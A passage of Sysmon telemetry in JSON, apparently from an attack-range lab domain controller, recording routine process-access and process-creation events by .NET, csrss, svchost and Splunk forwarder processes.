ac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7109,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:56.821\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12EC-5F25-0000-00109E660A00}\r\nTargetProcessId: 4704\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:56.821","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12EC-5F25-0000-00109E660A00}","TargetProcessId":"4704","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7110,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:56.821\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12EC-5F25-0000-00109E660A00}\r\nTargetProcessId: 4704\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:56.821","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12EC-5F25-0000-00109E660A00}","TargetProcessId":"4704","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7111,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:56.837\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12EC-5F25-0000-00109E660A00}\r\nTargetProcessId: 4704\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:56.837","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12EC-5F25-0000-00109E660A00}","TargetProcessId":"4704","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7112,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.322\r\nProcessGuid: {E2A3D6B1-12ED-5F25-0000-0010AD6A0A00}\r\nProcessId: 4588\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.322","ProcessGuid":"{E2A3D6B1-12ED-5F25-0000-0010AD6A0A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7113,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.321\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-12ED-5F25-0000-0010AD6A0A00}\r\nTargetProcessId: 4588\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.321","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-12ED-5F25-0000-0010AD6A0A00}","TargetProcessId":"4588","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7114,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.321\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12ED-5F25-0000-0010AD6A0A00}\r\nTargetProcessId: 4588\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.321","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12ED-5F25-0000-0010AD6A0A00}","TargetProcessId":"4588","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7115,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.321\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.321","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7116,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.321\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.321","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7117,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.321\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 